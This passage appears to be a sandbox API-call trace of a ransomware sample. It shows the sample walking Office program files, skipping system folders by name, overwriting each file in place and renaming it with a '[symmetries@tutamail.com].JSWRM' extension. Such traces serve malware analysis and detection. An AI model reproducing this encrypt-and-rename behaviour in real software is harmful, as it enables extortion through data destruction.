lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NEWS.DPV", lpUsedDefaultChar=0x0) returned 8 [0142.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.282] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NEWS.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\news.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.282] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=628314) returned 1 [0142.283] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.283] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0142.295] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.296] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0142.296] CloseHandle (hObject=0x238) returned 1 [0142.296] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NEWS.DPV" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\news.dpv"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NEWS.DPV.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\news.dpv.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.297] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x2335c7ca, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x2335c7ca, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2335c7ca, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4260, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="NEWS.XML", cAlternateFileName="")) returned 1 [0142.297] lstrcmpiW (lpString1="NEWS.XML", lpString2=".") returned 1 [0142.297] lstrcmpiW (lpString1="NEWS.XML", lpString2="..") returned 1 [0142.297] lstrcmpiW (lpString1="NEWS.XML", lpString2="...") returned 1 [0142.297] lstrcmpiW (lpString1="NEWS.XML", lpString2="windows") returned -1 [0142.298] lstrcmpiW (lpString1="NEWS.XML", lpString2="recovery") returned -1 [0142.298] lstrcmpiW (lpString1="NEWS.XML", lpString2="perflogs") returned -1 [0142.298] lstrcmpiW (lpString1="NEWS.XML", lpString2="documents and settings") returned 1 [0142.298] lstrcmpiW (lpString1="NEWS.XML", lpString2="$RECYCLE.BIN") returned 1 [0142.298] lstrcmpiW (lpString1="NEWS.XML", lpString2="system volume information") returned -1 [0142.298] lstrcmpiW (lpString1="NEWS.XML", lpString2="msocache") returned 1 [0142.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NEWS.XML", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0142.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NEWS.XML", cchWideChar=8, lpMultiByteStr=0x345ebd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NEWS.XML", lpUsedDefaultChar=0x0) returned 8 [0142.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NEWS.XML", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0142.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NEWS.XML", cchWideChar=8, lpMultiByteStr=0x345eba8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NEWS.XML", lpUsedDefaultChar=0x0) returned 8 [0142.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NEWS.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\news.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.299] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16992) returned 1 [0142.299] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.299] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4260, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x4260, lpOverlapped=0x0) returned 1 [0142.301] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.301] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4260, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x4260, lpOverlapped=0x0) returned 1 [0142.302] CloseHandle (hObject=0x238) returned 1 [0142.302] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NEWS.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\news.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NEWS.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\news.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.303] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23205288, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23205288, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x2335c7ca, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x87d24, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="NEWS11.POC", cAlternateFileName="")) returned 1 [0142.303] lstrcmpiW (lpString1="NEWS11.POC", lpString2=".") returned 1 [0142.303] lstrcmpiW (lpString1="NEWS11.POC", lpString2="..") returned 1 [0142.303] lstrcmpiW (lpString1="NEWS11.POC", lpString2="...") returned 1 [0142.303] lstrcmpiW (lpString1="NEWS11.POC", lpString2="windows") returned -1 [0142.303] lstrcmpiW (lpString1="NEWS11.POC", lpString2="recovery") returned -1 [0142.303] lstrcmpiW (lpString1="NEWS11.POC", lpString2="perflogs") returned -1 [0142.303] lstrcmpiW (lpString1="NEWS11.POC", lpString2="documents and settings") returned 1 [0142.303] lstrcmpiW (lpString1="NEWS11.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.303] lstrcmpiW (lpString1="NEWS11.POC", lpString2="system volume information") returned -1 [0142.303] lstrcmpiW (lpString1="NEWS11.POC", lpString2="msocache") returned 1 [0142.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NEWS11.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NEWS11.POC", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NEWS11.POC", lpUsedDefaultChar=0x0) returned 10 [0142.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NEWS11.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NEWS11.POC", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NEWS11.POC", lpUsedDefaultChar=0x0) returned 10 [0142.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.303] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NEWS11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\news11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.304] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=556324) returned 1 [0142.304] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.304] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0142.317] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.317] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0142.318] CloseHandle (hObject=0x238) returned 1 [0142.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0142.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0142.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0142.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0142.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0142.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0142.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0142.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0142.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0142.318] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0142.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0142.318] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0142.318] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NEWS11.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\news11.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NEWS11.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\news11.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0142.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0142.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0142.320] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23336629, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23336629, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x23467797, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2dc320, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="NEWS98.POC", cAlternateFileName="")) returned 1 [0142.320] lstrcmpiW (lpString1="NEWS98.POC", lpString2=".") returned 1 [0142.320] lstrcmpiW (lpString1="NEWS98.POC", lpString2="..") returned 1 [0142.320] lstrcmpiW (lpString1="NEWS98.POC", lpString2="...") returned 1 [0142.320] lstrcmpiW (lpString1="NEWS98.POC", lpString2="windows") returned -1 [0142.320] lstrcmpiW (lpString1="NEWS98.POC", lpString2="recovery") returned -1 [0142.320] lstrcmpiW (lpString1="NEWS98.POC", lpString2="perflogs") returned -1 [0142.320] lstrcmpiW (lpString1="NEWS98.POC", lpString2="documents and settings") returned 1 [0142.321] lstrcmpiW (lpString1="NEWS98.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.321] lstrcmpiW (lpString1="NEWS98.POC", lpString2="system volume information") returned -1 [0142.321] lstrcmpiW (lpString1="NEWS98.POC", lpString2="msocache") returned 1 [0142.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0142.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NEWS98.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NEWS98.POC", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NEWS98.POC", lpUsedDefaultChar=0x0) returned 10 [0142.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0142.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0142.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NEWS98.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NEWS98.POC", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NEWS98.POC", lpUsedDefaultChar=0x0) returned 10 [0142.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0142.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0142.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0142.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0142.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0142.321] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NEWS98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\news98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0142.322] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2999072) returned 1 [0142.322] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0142.322] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0142.336] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.337] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0142.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0142.337] CloseHandle (hObject=0x238) returned 1 [0142.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0142.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0142.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0142.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0142.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0142.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0142.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0142.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0142.337] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0142.337] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0142.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0142.337] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0142.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0142.338] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0142.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0142.338] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0142.338] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NEWS98.POC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\news98.poc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PUBWIZ\\NEWS98.POC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pubwiz\\news98.poc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0142.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0142.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0142.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0142.339] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x23382990, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x23382990, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x245fcdca, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5166c, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="NEWSHM.POC", cAlternateFileName="")) returned 1 [0142.339] lstrcmpiW (lpString1="NEWSHM.POC", lpString2=".") returned 1 [0142.339] lstrcmpiW (lpString1="NEWSHM.POC", lpString2="..") returned 1 [0142.339] lstrcmpiW (lpString1="NEWSHM.POC", lpString2="...") returned 1 [0142.339] lstrcmpiW (lpString1="NEWSHM.POC", lpString2="windows") returned -1 [0142.339] lstrcmpiW (lpString1="NEWSHM.POC", lpString2="recovery") returned -1 [0142.339] lstrcmpiW (lpString1="NEWSHM.POC", lpString2="perflogs") returned -1 [0142.339] lstrcmpiW (lpString1="NEWSHM.POC", lpString2="documents and settings") returned 1 [0142.340] lstrcmpiW (lpString1="NEWSHM.POC", lpString2="$RECYCLE.BIN") returned 1 [0142.340] lstrcmpiW (lpString1="NEWSHM.POC", lpString2="system volume information") returned -1 [0142.340] lstrcmpiW (lpString1="NEWSHM.POC", lpString2="msocache") returned 1 [0142.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0142.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NEWSHM.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NEWSHM.POC", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NEWSHM.POC", lpUsedDefaultChar=0x0) returned 10 [0142.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0142.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0142.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NEWSHM.POC", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0142.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NEWSHM.POC", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NEWSHM.POC", lpUsedDefaultChar=0x0) returned 10 [0142.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0142.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0142.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0142.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0142.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 